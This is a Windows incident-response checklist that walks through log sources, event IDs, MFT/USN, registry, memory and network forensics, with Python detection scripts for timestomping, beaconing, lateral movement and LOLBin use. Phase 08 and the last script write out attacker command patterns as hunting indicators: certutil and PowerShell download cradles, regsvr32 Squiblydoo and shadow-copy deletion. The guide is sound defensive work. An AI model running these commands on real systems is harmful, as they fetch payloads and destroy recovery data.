Windows DFIR • Networked Environment

Incident Investigation
Walkthrough & Checklist

Step-by-step artefact collection & analysis guide // Windows endpoints + network infrastructure
Log sources • Event IDs • MFT/USN • Registry • Memory • Network • Threat Actor TTPs

PHASE 01
Scoping & Initial Response
Before touching the environment
⚠ Evidence Integrity Warning

Live triage modifies timestamps, pagefile, and memory. Always document your actions. Collect volatile data first. Never run tools directly from suspect media.

Case Initialisation
Document initial alert/report source and timestamp
Record detection method: EDR alert, SIEM rule, user report, threat intel, third-party notification
Open formal incident case, assign severity (P0–P4)
Trigger IMT if P0/P1. Notify CISO/DPO if personal data at risk (UK GDPR 72hr clock starts)
CRITICAL
Identify affected systems, users, and business services
Asset owner, criticality tier, connected dependencies, data classification of hosted data
Confirm investigation legal authority / scope of access
Employment contracts, BYOD considerations, legal hold requirements, cloud jurisdiction
Establish chain of custody for all acquired evidence
Hash all acquired images (SHA-256). Label physical/digital media. CoC form completed per exhibit
Scoping Questions
Determine approximate time of compromise (T0)
Earliest known indicator. Work backwards from detection. Define log lookback window
Identify initial access vector (phishing, exposed service, supply chain, insider)
Review: email logs, proxy/firewall, VPN auth, RDP exposure, vulnerable service versioning
CRITICAL
Confirm whether active threat actor presence is suspected
If yes: consider isolation strategy, comms channel security, avoid tipping off TA
Identify blast radius: lateral movement / domain compromise suspected?
Check: AD replication, Kerberos tickets, Golden/Silver ticket indicators, admin share usage
Confirm data exfiltration: is data at risk or confirmed exfiltrated?
DLP alerts, large outbound transfers, cloud sync activity, staging directories
PHASE 02
Log Source Collection
Preserve before requesting; timestamps degrade
Windows Endpoint Logs
Security event log — Security.evtx
Authentication, privilege use, object access, policy changes. Location: %SystemRoot%\System32\winevt\Logs\Security.evtx
System event log — System.evtx
Service installs, driver loads, boot events, crashes, USB device connections
Application event log — Application.evtx
App crashes, AV detections, installer events, .NET runtime errors
PowerShell Operational & Script Block logs
Microsoft-Windows-PowerShell%4Operational.evtx
Microsoft-Windows-PowerShell%4Analytic.etl
Script block logging (EID 4104) captures deobfuscated PS content
CRITICAL
Sysmon event log (if deployed)
Microsoft-Windows-Sysmon%4Operational.evtx — Process create, network conn, file create, registry, DNS queries, pipe events
WMI Activity & Microsoft-Windows-WMI-Activity logs
WMI subscriptions used for persistence. Check WBEM\Repository binaries
Task Scheduler log — Microsoft-Windows-TaskScheduler%4Operational.evtx
EID 106 (task created), 200 (task executed). Review %SystemRoot%\System32\Tasks\
RDP/Terminal Services logs
Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx — session connect/disconnect/reconnect
Windows Defender / AV operational log
Microsoft-Windows-Windows Defender%4Operational.evtx — detections, real-time protection state, exclusions added
Bits Client operational log
Microsoft-Windows-Bits-Client%4Operational.evtx — BITS used for stealthy downloads (living-off-the-land)
Network & Infrastructure Logs
Firewall logs (perimeter & host-based)
Inbound/outbound connections, blocked traffic, port scans. Correlate with endpoint artefacts for C2 IPs
CRITICAL
Proxy / web gateway logs
HTTP/HTTPS destinations, user-agent strings, referrers, POST body sizes. Look for DGA domains, beaconing patterns
DNS logs (resolver + recursive)
DNS tunnelling (high-entropy subdomains, large TXT records), DGA lookups, unusual PTR queries
VPN / remote access authentication logs
Source IPs, geolocations, authentication timestamps, concurrent sessions, impossible travel
Network flow data (NetFlow / IPFIX / sFlow)
Traffic volume anomalies, lateral movement between hosts, port scans, data staging volumes
Active Directory / LDAP logs (DC Security logs)
Account creation, group membership changes, GPO modifications, replication events, DCSync activity
Email gateway / MTA logs
Phishing delivery, header anomalies, attachment types, sender reputation, forwarding rules set by attackers
DHCP logs — lease history for IP-to-hostname mapping
Essential for attributing network activity to specific endpoints. Rogue DHCP servers indicate network compromise
EDR telemetry (CrowdStrike, Defender for Endpoint, SentinelOne)
Process trees, network connections, file writes, parent-child anomalies, AMSI events
Cloud / Identity Logs
Azure AD / Entra ID sign-in & audit logs
MFA bypass, legacy auth, conditional access failures, OAuth app consent grants, guest account activity
Microsoft 365 Unified Audit Log (UAL)
Email rules, Teams messages, SharePoint file access, mail forwarding, eDiscovery searches by attacker
PHASE 03
Key Windows Event IDs
What to hunt in Security.evtx and beyond
Authentication & Account Activity
Logon / Logoff events reviewed
4624 Successful logon (check logon type: 3=network, 10=RemoteInteractive)
4625 Failed logon — brute force indicator
4634 Logoff
4648 Explicit credentials logon (runas / pass-the-hash pivot)
4672 Special privileges assigned — admin logon
CRITICAL
Kerberos authentication events reviewed
4768 TGT requested
4769 Service ticket requested (look for RC4 encryption — downgrade attack)
4771 Kerberos pre-auth failed — password spray
4776 NTLM auth — lateral movement indicator
Account creation and privilege changes
4720 User account created
4728/4732 Member added to security group
4756 Member added to universal group
4738 User account changed
4723/4724 Password change / password reset attempt
Account lockout events (source workstation logged)
4740 Account locked out — source workstation field identifies spray origin. Check on DCs
Process & Command Execution
Process creation (command line auditing enabled)
4688 Process created with full command line (requires audit policy)
Sysmon EID 1 provides richer data including parent process, hashes
Look for: cmd.exe spawning from Office apps, unusual parent-child chains
CRITICAL
PowerShell script block logging reviewed
4104 Script block (deobfuscated content)
4103 Module logging
400/800 Engine started/stopped — console host history at %AppData%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Scheduled task creation / modification
4698 Scheduled task created
4702 Scheduled task updated
106/200 Task Scheduler operational log
Service installation events
4697 Service installed (Security log)
System 7045 New service installed — common for malware persistence
7036 Service started/stopped
Object Access & Privilege Use
Sensitive privilege use (credential access)
4673 Sensitive privilege use (SeDebugPrivilege = LSASS dumping)
4674 Operation attempt on privileged object
4611 Trusted logon process registered
File share / SMB access events on servers
5140 Network share accessed
5145 File access check on share (noisy but detailed)
5142/5143 Share created/modified
Registry key modification (if SACL enabled)
4657 Registry value modified
Sysmon EID 12/13/14 — more reliable registry monitoring
Audit policy changes
4719 System audit policy changed — attacker covering tracks
1102 Audit log cleared
104 System log cleared (System log)
Network & Firewall Events
Sysmon network connection events
Sysmon EID 3 — outbound connections with process name, destination IP/port. Essential for C2 mapping
Windows Firewall operational log
5156/5158 Connection allowed (WFP)
5157/5159 Connection blocked
4946/4947 Firewall rule added/modified
RDP / remote session events
21 RDP session logon (LocalSessionManager)
25 RDP session reconnect
1149 RDP user auth (RDPCoreTS — check for lateral movement source IP)
DNS query log (Sysmon EID 22)
Sysmon EID 22 — DNS queries by process. Identify C2, DGA, and data exfil over DNS
Sysmon Quick Reference
Key Sysmon Event IDs

1 Process create
2 File creation time change
3 Network connection
5 Process terminated
6 Driver loaded
7 Image (DLL) loaded
8 CreateRemoteThread (injection)
10 Process access (credential dump)
11 File create
12/13/14 Registry
15 File stream create (ADS)
17/18 Named pipe
22 DNS query
23 File delete
25 Process tampering
26 File delete detected

PHASE 04
Filesystem Artefacts
MFT, USN Journal, Prefetch, LNK, Shellbags & more
MFT ($MFT) Analysis
About the MFT

The Master File Table is the definitive record of every file on an NTFS volume. Each MFT entry stores timestamps ($STANDARD_INFORMATION and $FILE_NAME), file size, attributes, and file existence even post-deletion (until overwritten). Tool: MFTECmd, Autopsy, KAPE.

Acquire raw MFT from target volume
MFTECmd.exe -f $MFT --csv output_dir
Use KAPE or raw copy — cannot be done from running OS normally
CRITICAL
Look for timestomping: $SI vs $FN timestamp discrepancy
$STANDARD_INFORMATION can be modified by tools like Meterpreter/timestomp. $FILE_NAME is kernel-maintained and harder to fake. Discrepancy >1s is suspicious
Identify files created in suspicious directories during incident window
Focus: %TEMP%, %AppData%\Roaming, C:\ProgramData, C:\Windows\Temp, C:\Users\Public, Recycle Bin
Check for Alternate Data Streams (ADS) hiding payloads
streams.exe -s C:\ or Get-Item * -Stream * in PS. Sysmon EID 15. Zone.Identifier stream indicates downloaded files
Review deleted file records (MFT entries with $FILE_NAME but no $DATA)
MFT entry persists after deletion. Files recoverable until clusters overwritten. Check Recycle Bin $I / $R records
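The $SI vs $FN check above, as an added example that is not part of this checklist: it reads an MFTECmd-style $MFT CSV export and flags entries whose $STANDARD_INFORMATION created timestamp predates the $FILE_NAME one by more than the 1s threshold (the same logic as MFTECmd's SI<FN column), with all-zero sub-second digits as a weaker secondary signal. The CSV rows are constructed, and the column names are assumed to match MFTECmd's output.

```python
import csv
import io
from datetime import datetime, timedelta

# Constructed sample shaped like MFTECmd's $MFT CSV export (column names are
# assumed to match MFTECmd's; only the columns this check reads are included).
SAMPLE_MFT_CSV = """EntryNumber,InUse,ParentPath,FileName,Created0x10,Created0x30
101,True,.\\Users\\Public,notes.txt,2024-03-04 10:15:22.1234567,2024-03-04 10:15:22.1234567
102,True,.\\Windows\\Temp,svch0st.exe,2019-07-16 08:00:00.0000000,2024-03-04 10:21:47.5551234
103,False,.\\Users\\Public,stage.zip,2024-03-04 10:30:05.4440000,2024-03-04 10:30:05.4440000
104,True,.\\ProgramData,update.dll,2024-03-04 10:33:00.0000000,2024-03-04 10:33:00.0000000
"""

def parse_ts(value):
    """Parse an MFTECmd timestamp (7 fractional digits) into (datetime, fraction_str)."""
    base, _, frac = value.partition(".")
    dt = datetime.strptime(base, "%Y-%m-%d %H:%M:%S")
    # datetime only holds microseconds; the raw fraction is kept for the zero check.
    return dt.replace(microsecond=int(frac[:6].ljust(6, "0"))), frac

def find_timestomp_candidates(csv_text, threshold=timedelta(seconds=1)):
    """Map MFT entry number -> details for entries whose $SI created timestamp
    looks tampered with relative to the kernel-maintained $FN timestamp."""
    findings = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        si, si_frac = parse_ts(row["Created0x10"])
        fn, _ = parse_ts(row["Created0x30"])
        reasons = []
        # Strong signal: $SI created predates $FN created (MFTECmd's SI<FN logic).
        # $FN lagging behind $SI is normal, since $FN is only refreshed on
        # rename/move; a backdated $SI is the classic timestomp pattern, but
        # confirm against the USN journal before calling it.
        if fn - si > threshold:
            reasons.append(f"$SI created predates $FN created by {fn - si}")
        # Weaker signal: timestomping utilities usually write whole-second values,
        # so all-zero sub-second digits deserve a second look.
        if si_frac and set(si_frac) == {"0"}:
            reasons.append("$SI created has all-zero sub-second digits")
        if reasons:
            findings[int(row["EntryNumber"])] = {
                "path": f"{row['ParentPath']}\\{row['FileName']}",
                "in_use": row["InUse"] == "True",   # False = deleted, record not yet reused
                "reasons": reasons,
            }
    return findings

if __name__ == "__main__":
    for entry, info in find_timestomp_candidates(SAMPLE_MFT_CSV).items():
        state = "live" if info["in_use"] else "deleted"
        print(f"MFT #{entry} [{state}] {info['path']}")
        for reason in info["reasons"]:
            print(f"    - {reason}")
```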
USN Change Journal ($J)
About the USN Journal

The Update Sequence Number journal records every file system operation (create, rename, delete, write, extend, security change) with a timestamp. It acts as a near-complete filesystem activity log. Persists independently of file deletion. Essential for proving file lifecycle. Tool: MFTECmd, fsutil usn.

Acquire and parse USN Journal
MFTECmd.exe -f $J --csv output_dir
Provides rename chains, temp file patterns, and deletion timestamps
Identify renamed executables and double-extension tricks
USN records rename operations with before/after names. Find: invoice.pdf → invoice.pdf.exe, LOLBINs renamed to benign names
CRITICAL
Correlate USN timestamps with event log activity during T0 window
File activity during known compromise window corroborates timeline. Tool: Timeline Explorer (EricZimmerman)
Prefetch & Execution Evidence
Parse Prefetch files for execution history
C:\Windows\Prefetch\*.pf — Tool: PECmd.exe
Provides: executable name, run count, last 8 run times, files loaded. Evidence even if executable deleted
CRITICAL
Check AmCache.hve for program execution and file hash
C:\Windows\AppCompat\Programs\Amcache.hve — stores SHA-1 hash of executables. Tool: AmcacheParser.exe
ShimCache / AppCompatCache — application compatibility registry
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache — evidence of execution (server 2012+). Tool: AppCompatCacheParser.exe
SRUM database (System Resource Usage Monitor)
C:\Windows\System32\sru\SRUDB.dat — records per-app CPU, memory, network usage for 30-60 days. Proves execution even if no prefetch. Tool: SrumECmd
User Activity Artefacts
LNK files (shortcut files) — evidence of file access
%AppData%\Microsoft\Windows\Recent\ — stores MAC timestamps of target file at time of access. Tool: LECmd.exe
Jump Lists — recent files per application
%AppData%\Microsoft\Windows\Recent\AutomaticDestinations\ — per-app recent file access. Tool: JLECmd.exe
Shellbags — directory traversal evidence
USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU — records folders opened even from deleted/external media. Tool: SBECmd
Browser history / download records
Chrome: %LocalAppData%\Google\Chrome\User Data\Default\History
Edge: %LocalAppData%\Microsoft\Edge\User Data\Default\History — SQLite DBs
Recycle Bin ($I / $R records)
C:\$Recycle.Bin\[SID]\ — $I file stores original path, deletion timestamp, file size. $R contains actual file content
PHASE 05
Registry Forensics
Persistence, credential access, lateral movement indicators
Persistence Mechanisms
Run / RunOnce keys reviewed
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Check both 64-bit and 32-bit hives (Wow6432Node)
CRITICAL
Services registry hive
HKLM\SYSTEM\CurrentControlSet\Services — malicious services with ImagePath pointing to payloads. Check for recently modified entries
Winlogon hijacking keys
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Check: Userinit, Shell, Notify values for appended executables
Image File Execution Options (IFEO) — debugger hijacking
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options — Debugger value redirects binary execution (accessibility feature abuse: sethc.exe, utilman.exe)
AppInit_DLLs — DLL injection on any user-mode process
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs — Should be empty in legitimate environments
COM object hijacking
HKCU\Software\Classes\CLSID\ — user-writable COM registrations that override system defaults. Used for UAC bypass and persistence
User Activity & Lateral Movement
MRU lists — most recently used files/commands
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU — commands run via Win+R
Network shares and mapped drives (MountPoints2)
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 — records connected network shares including UNC paths to attacker infrastructure
TypedURLs — manually typed browser URLs
HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs — useful if malware infrastructure accessed via browser
USB / removable media history
HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR — device VID/PID, serial, first/last connection
HKLM\SOFTWARE\Microsoft\Windows Portable Devices\Devices
SAM & SECURITY hive — local account and credential policy
HKLM\SAM — local user accounts (access requires SYSTEM). HKLM\SECURITY\Cache — cached domain credentials (DCCACHE). Requires offline parsing: secretsdump, impacket
Last write time on registry keys as timeline evidence
Registry hive key last-write timestamps survive reboots. Tool: RegRipper, RegistryExplorer. Cross-correlate with T0 window
PHASE 06
Memory Forensics
Volatile, lost on reboot — prioritise if system still live
⚠ Acquisition Priority — Live System

Memory must be captured before any reboot or shutdown. Use: WinPmem, DumpIt, Magnet RAM Capture, or EDR built-in. Hash immediately. Memory analysis tools: Volatility 3, Rekall.

Process & Injection Analysis
Run pslist / pstree — identify rogue/orphaned processes
vol3 -f dump.raw windows.pslist / windows.pstree
Look for: cmd.exe under svchost, powershell spawned by Word/Excel, unusual parent PIDs
CRITICAL
psscan — detect DKOM-hidden processes
vol3 windows.psscan — scans pool tags rather than walking EPROCESS list. Processes in psscan but not pslist = rootkit hiding
malfind — detect injected shellcode and PE headers
vol3 windows.malfind — identifies VAD regions that are executable, not mapped to disk, and contain PE headers or shellcode. High-confidence injection indicator
CRITICAL
dlllist / ldrmodules — detect hidden/unlinked DLLs
vol3 windows.dlllist — compare against ldrmodules to find DLLs present in VAD but not in PEB loader lists (reflective DLL injection)
handles — open file handles and registry keys per process
vol3 windows.handles --pid [PID] — reveals C2 socket handles, staging file handles, mutex names (malware fingerprints)
Network & Credential Recovery
netstat — active and listening connections in memory
vol3 windows.netstat — shows established connections with associated process. Identify C2 IPs and ports active at acquisition time
LSASS process memory — credential extraction evidence
vol3 windows.lsadump / check for LSASS minidumps on disk (C:\Windows\Temp\lsass.dmp)
Evidence of Mimikatz, ProcDump, comsvcs.dll MiniDump technique
CRITICAL
cmdline / cmdscan — command history from memory
vol3 windows.cmdline / windows.cmdscan — recover commands from console hosts, including those not written to disk
Strings / YARA scan for IOCs in full memory dump
vol3 windows.strings — extract readable strings. Run YARA rules against raw dump for known malware signatures, C2 domains, API key strings
Dump suspicious processes / injected regions for static analysis
vol3 windows.dumpfiles --pid [PID] — extract process executables and DLLs for AV scanning, hashing, OSINT lookup on VirusTotal
PHASE 07
Network Forensics
C2, lateral movement, exfil — across the wire
C2 & Beaconing Detection
Identify periodic/regular outbound connections (beaconing)
Run beacon analysis over proxy/firewall logs. Tools: RITA, Zeek + Bro scripts. Look for: consistent jitter, small payload size, long connection duration
CRITICAL
Analyse user-agent strings for non-browser processes making HTTP/S requests
Cobalt Strike default: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0). PowerShell WinHTTP, curl-style strings from svchost are suspicious
DNS tunnelling / DGA domain analysis
High entropy subdomains, large TXT record responses, unusually high query rate. Tools: DNSTwist, frequency analysis. Check: iodine, dnscat2 patterns
SSL/TLS certificate analysis on C2 connections
Self-signed certs, short validity, unusual SNI, mismatched CN. JA3/JA3S fingerprinting for TLS client/server fingerprints
PCAP analysis of suspicious sessions
Wireshark / Zeek. Extract files, credentials, commands. Look for: SMB lateral movement, LDAP recon queries, impacket tool signatures
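The beaconing check described in this section, as an added example that is not part of this checklist: it groups proxy connections per source/destination pair, measures how regular the inter-arrival times are (jitter as coefficient of variation of the gaps) and reports the median request size. The log format is a simplified constructed one, and the min_hits / max_jitter thresholds are assumptions that need tuning per environment.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log lines (not from a real environment), simplified to
# "timestamp source_host destination bytes_sent"; a real feed needs its own
# parser for the squid/Zscaler/Bluecoat format in use.
SAMPLE_PROXY_LOG = """\
2024-03-04T10:00:00 WS-017 updates.example-cdn.net 512
2024-03-04T10:00:07 WS-017 news.example.org 18240
2024-03-04T10:01:01 WS-017 updates.example-cdn.net 498
2024-03-04T10:02:03 WS-017 updates.example-cdn.net 505
2024-03-04T10:02:40 WS-017 news.example.org 22011
2024-03-04T10:03:00 WS-017 updates.example-cdn.net 511
2024-03-04T10:04:02 WS-017 updates.example-cdn.net 503
2024-03-04T10:05:01 WS-017 updates.example-cdn.net 509
2024-03-04T10:09:15 WS-017 news.example.org 15602
2024-03-04T10:31:44 WS-017 news.example.org 30988
"""

def parse_proxy_log(text):
    """Turn the simplified log into (datetime, src, dst, bytes) tuples."""
    events = []
    for line in text.splitlines():
        ts, src, dst, size = line.split()
        events.append((datetime.fromisoformat(ts), src, dst, int(size)))
    return events

def beacon_candidates(events, min_hits=5, max_jitter=0.15):
    """Group connections per (src, dst) pair and flag pairs whose inter-arrival
    times are close to regular: jitter is the coefficient of variation
    (population stddev / mean) of the gaps, so 0.0 is a perfect metronome."""
    by_pair = defaultdict(list)
    for ts, src, dst, size in events:
        by_pair[(src, dst)].append((ts, size))
    findings = []
    for (src, dst), hits in by_pair.items():
        if len(hits) < min_hits:          # too few samples to judge regularity
            continue
        hits.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(hits, hits[1:])]
        mean_gap = statistics.mean(gaps)
        jitter = statistics.pstdev(gaps) / mean_gap if mean_gap else 0.0
        if jitter <= max_jitter:
            findings.append({
                "src": src, "dst": dst, "count": len(hits),
                "interval_s": round(mean_gap, 1), "jitter": round(jitter, 3),
                # small, uniform request sizes are the other beacon hallmark
                "median_bytes": statistics.median(size for _, size in hits),
            })
    return findings

if __name__ == "__main__":
    for f in beacon_candidates(parse_proxy_log(SAMPLE_PROXY_LOG)):
        print(f"{f['src']} -> {f['dst']}: {f['count']} hits every ~{f['interval_s']}s "
              f"(jitter {f['jitter']}), median {f['median_bytes']} bytes")
```

Frameworks that add configured sleep jitter will score higher than this sample, so treat max_jitter as a starting point and review the interval distribution rather than relying on a single cut-off.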
Lateral Movement & Exfiltration
SMB lateral movement — admin share connections (ADMIN$, C$, IPC$)
NetFlow data: SMB (445/tcp) connections between internal hosts. Correlate: 4624 logon type 3 + 5140 (share access) on target + event 4648 on the source host
CRITICAL
WMI remote execution — DCOM/RPC lateral movement
Port 135/tcp (DCOM), dynamic high ports. Source: wmic.exe /node:[TARGET], impacket wmiexec. Look for: wmiprvse.exe spawning cmd.exe on target
RDP lateral movement from compromised hosts
Internal RDP (3389/tcp) between hosts — unusual if not expected. Correlate with 4624 type 10 (RemoteInteractive) on destination
Data staging and exfil volume analysis
Large sustained outbound data transfers to single destination. Cloud storage (Mega, Dropbox, rclone). Port 443 to IP without SNI. Estimate data volume in GB
ICMP/non-standard protocol covert channels
Unusual ICMP payload sizes, abnormal packet rates. Non-standard port usage by known processes (e.g. svchost on port 53 without DNS process)
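The SMB lateral movement correlation from the first item in this section, as an added example that is not part of this checklist: it chains a 4624 type 3 logon to a 5140 admin share access on the target by logon session ID, then looks for a corroborating 4648 on the source host within a time window. The events are constructed, and the IP-to-hostname mapping is an assumed stand-in for DHCP lease history.

```python
from datetime import datetime, timedelta

# Constructed Security log events from a workstation and a file server (not real
# telemetry). Field names follow the Security.evtx EventData names for 4624,
# 4648 and 5140 so the logic maps directly onto exported events.
SAMPLE_EVENTS = [
    # Source workstation: explicit-credential logon aimed at the file server
    {"host": "WS-017", "eid": 4648, "time": "2024-03-04T11:02:10",
     "SubjectUserName": "j.smith", "TargetUserName": "svc_backup", "TargetServerName": "FS-01"},
    # Target server: network logon from the workstation, then admin share access
    {"host": "FS-01", "eid": 4624, "time": "2024-03-04T11:02:11", "TargetUserName": "svc_backup",
     "LogonType": 3, "IpAddress": "10.10.5.17", "TargetLogonId": "0x3A7F21"},
    {"host": "FS-01", "eid": 5140, "time": "2024-03-04T11:02:12", "SubjectUserName": "svc_backup",
     "SubjectLogonId": "0x3A7F21", "ShareName": "\\\\*\\ADMIN$", "IpAddress": "10.10.5.17"},
    # Benign noise: a user reaching a departmental share, no explicit-credential logon
    {"host": "FS-01", "eid": 4624, "time": "2024-03-04T11:05:00", "TargetUserName": "a.jones",
     "LogonType": 3, "IpAddress": "10.10.5.40", "TargetLogonId": "0x3B0001"},
    {"host": "FS-01", "eid": 5140, "time": "2024-03-04T11:05:03", "SubjectUserName": "a.jones",
     "SubjectLogonId": "0x3B0001", "ShareName": "\\\\*\\Finance", "IpAddress": "10.10.5.40"},
]

# Assumed IP-to-hostname mapping; in practice built from DHCP lease history.
IP_TO_HOST = {"10.10.5.17": "WS-017", "10.10.5.40": "WS-040"}
ADMIN_SHARES = {"ADMIN$", "C$", "IPC$"}

def event_time(e):
    return datetime.fromisoformat(e["time"])

def correlate_smb_lateral_movement(events, window=timedelta(seconds=60)):
    """Chain 4624 (type 3) -> 5140 (admin share) on the target by logon session ID,
    then look for a corroborating 4648 on the source host within the window."""
    logons = [e for e in events if e["eid"] == 4624 and e.get("LogonType") == 3]
    shares = [e for e in events if e["eid"] == 5140]
    explicit = [e for e in events if e["eid"] == 4648]
    chains = []
    for logon in logons:
        for share in shares:
            same_session = (share["host"] == logon["host"]
                            and share["SubjectLogonId"] == logon["TargetLogonId"])
            admin_share = share["ShareName"].rsplit("\\", 1)[-1] in ADMIN_SHARES
            in_window = timedelta(0) <= event_time(share) - event_time(logon) <= window
            if not (same_session and admin_share and in_window):
                continue
            src_host = IP_TO_HOST.get(logon["IpAddress"])
            corroborated = any(
                e["host"] == src_host
                and e["TargetServerName"] == logon["host"]
                and e["TargetUserName"] == logon["TargetUserName"]
                and abs(event_time(e) - event_time(logon)) <= window
                for e in explicit)
            chains.append({"time": logon["time"], "source": src_host or logon["IpAddress"],
                           "target": logon["host"], "account": logon["TargetUserName"],
                           "share": share["ShareName"], "source_4648": corroborated})
    return chains

if __name__ == "__main__":
    for c in correlate_smb_lateral_movement(SAMPLE_EVENTS):
        flag = "corroborated by 4648" if c["source_4648"] else "no 4648 on source"
        print(f"{c['time']} {c['source']} -> {c['target']} {c['share']} as {c['account']} ({flag})")
```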
PHASE 08
Threat Actor TTPs & Tooling
Common attacker toolkits, living-off-the-land, and ATT&CK mapping
Common Attacker Tooling — Check for Artefacts
Cobalt Strike beacon evidence
Indicators: named pipes (MSSE-*-server, postex_*), shellcode in injected processes, sleep masking (stomped memory), characteristic HTTP/S malleable C2 profiles, default ports (50050 team server)
CRITICAL
Mimikatz credential dumping evidence
EID 4673 (SeDebugPrivilege), Sysmon EID 10 (LSASS access)
Artefacts: sekurlsa::logonpasswords strings in memory, LSASS dump files, mimilib.dll in SYSTEM32
BloodHound / SharpHound AD enumeration
Massive LDAP query burst from single host, queries for AdminTo/CanRDPTo/HasSession. LDAP port 389/636 spike. Event: 4662 (AD object access)
Impacket toolkit (secretsdump, psexec, wmiexec, smbexec)
Artefacts: service name BTOBTO (psexec), randomised service names, RemCom strings, SMB file writes of *.exe to ADMIN$
Python-based — may leave impacket strings in network traffic
Rclone / MEGAcmd / cloud exfil tool evidence
Prefetch for rclone.exe, mega.exe. Config files: %AppData%\rclone\rclone.conf. Large sustained HTTPS transfers to cloud storage CDN IPs
Netscan / Advanced Port Scanner / SoftPerfect
Discovery tools with prefetch artefacts, large numbers of failed connection events across internal IP ranges in a short window
AnyDesk / TeamViewer / ScreenConnect — RMM abuse
Prefetch, install logs, process create events. Used for persistent remote access, often installed post-initial-access before C2 established
Living-off-the-Land (LOLBin) Abuse
PowerShell — encoded commands, download cradles, bypass flags
Flags to hunt: -EncodedCommand, -ExecutionPolicy Bypass, -WindowStyle Hidden, -NonInteractive
Download cradles: IEX (New-Object Net.WebClient).DownloadString(), Invoke-Expression
CRITICAL
certutil.exe — file download and base64 decode
certutil -decode, certutil -urlcache -split -f [URL] — used to fetch and decode payloads. Check prefetch and 4688 command line
mshta.exe / wscript.exe / cscript.exe — script execution
Execute HTA, VBS, JS payloads. Look for: mshta http://, wscript C:\Temp\. Common initial access post-phishing payload delivery
rundll32.exe / regsvr32.exe — DLL execution
rundll32 shell32.dll,ShellExec_RunDLL, regsvr32 /s /n /u /i:http:// (Squiblydoo)
Parent process and command line critical for triage
wmic.exe — WMI remote execution and reconnaissance
wmic /node:[TARGET] process call create "[cmd]" for lateral movement. wmic shadowcopy delete for ransomware VSS deletion
bitsadmin.exe / curl.exe — file downloads
bitsadmin /transfer for persistent background downloads. curl -o payload delivery. Leaves BITS job entries and BITS operational log events
VSS deletion — ransomware pre-encryption step
Commands: vssadmin delete shadows /all /quiet, wmic shadowcopy delete, bcdedit /set {default} recoveryenabled no
EID 4688 with these command lines = imminent encryption event
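A triage pass over 4688 / Sysmon EID 1 command lines for the LOLBin flags, download cradles and VSS deletion commands listed in this section, as an added example that is not part of this checklist. The process records are constructed (the base64 blob is a placeholder, not a payload), the rule set and severities are assumptions to be extended, and the Office-spawns-shell check covers the parent/child point from the Process & Command Execution phase.

```python
import re

# Constructed 4688 / Sysmon EID 1 style records (not real telemetry):
# (host, parent image, new process image, command line). The base64 blob is a
# constructed placeholder, not a payload.
SAMPLE_PROCESS_EVENTS = [
    ("WS-017", "WINWORD.EXE", "powershell.exe",
     "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand QQBBAEEA"),
    ("WS-017", "cmd.exe", "certutil.exe",
     "certutil -urlcache -split -f http://203.0.113.10/p.txt C:\\Windows\\Temp\\p.txt"),
    ("FS-01", "cmd.exe", "vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ("FS-01", "cmd.exe", "bcdedit.exe", "bcdedit /set {default} recoveryenabled no"),
    ("WS-040", "explorer.exe", "powershell.exe", "powershell.exe -File C:\\Scripts\\inventory.ps1"),
    ("WS-040", "svchost.exe", "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
]

# (rule name, regex over the command line, severity). PowerShell accepts
# abbreviated switches (-e, -ec, -enc, -w, -ex ...), so the patterns allow them.
RULES = [
    ("PowerShell bypass/hidden/encoded flags",
     r"-(?:e|ec|enc|encodedcommand)\b|-(?:ex|exec|executionpolicy)\s+bypass"
     r"|-(?:w|win|windowstyle)\s+hidden|-(?:noni|noninteractive)\b", "high"),
    ("Download cradle", r"\biex\b|invoke-expression|downloadstring|downloadfile", "high"),
    ("certutil download/decode", r"certutil(?:\.exe)?\s.*(?:-urlcache|-decode)", "high"),
    ("regsvr32 scriptlet (Squiblydoo)", r"regsvr32(?:\.exe)?\s.*/i:https?://", "high"),
    ("mshta/wscript/cscript remote or temp payload",
     r"(?:mshta|wscript|cscript)(?:\.exe)?\s+\S*(?:https?://|\\temp\\)", "medium"),
    ("wmic remote process create", r"wmic(?:\.exe)?\s+/node:", "high"),
    ("VSS / recovery tampering",
     r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete"
     r"|bcdedit(?:\.exe)?\s.*recoveryenabled\s+no", "critical"),
]
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SEVERITY_RANK = {"medium": 1, "high": 2, "critical": 3}

def triage_process_events(events):
    """Return one finding per event that matches a rule or an Office-spawns-shell
    parent/child pair, carrying the highest severity of everything that matched."""
    findings = []
    for host, parent, image, cmdline in events:
        matched = [(name, sev) for name, pattern, sev in RULES
                   if re.search(pattern, cmdline, re.IGNORECASE)]
        if parent.upper() in OFFICE_PARENTS and image.lower() in SHELLS:
            matched.append(("Office application spawned a shell", "high"))
        if matched:
            findings.append({"host": host, "image": image, "cmdline": cmdline,
                             "rules": [n for n, _ in matched],
                             "severity": max((s for _, s in matched), key=SEVERITY_RANK.get)})
    return findings

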